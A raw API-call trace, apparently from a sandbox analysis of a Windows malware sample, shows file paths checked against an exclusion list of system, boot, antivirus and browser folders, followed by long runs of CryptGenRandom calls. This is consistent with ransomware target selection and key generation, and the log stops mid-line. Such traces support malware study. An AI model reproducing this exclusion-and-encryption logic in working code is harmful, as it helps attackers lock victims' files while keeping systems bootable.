[0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*NTUSER.DAT*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*AppData*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*\\winrar\\*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*\\java\\*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*\\windows\\*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*\\ESET\\*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*\\AVG\\*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*\\AVIRA\\*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*Atheros*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*Realtek*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*bootmgr*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*boot*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*boot*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*CONFIG.SYS*") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*IO.SYS*") returned 0 [0143.528] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*MSDOS.SYS*") returned 0 [0143.528] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*NTDETECT.COM*") returned 0 [0143.528] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*ntldr*") returned 0 [0143.528] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*chrome*") returned 0 [0143.528] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*opera*") returned 0 [0143.528] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*firefox*") returned 0 [0143.528] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml", pszSpec="*") returned 1 [0143.528] strlen (_Str="NMoreira") returned 0x8 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.530] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.531] CryptGenRandom (in: 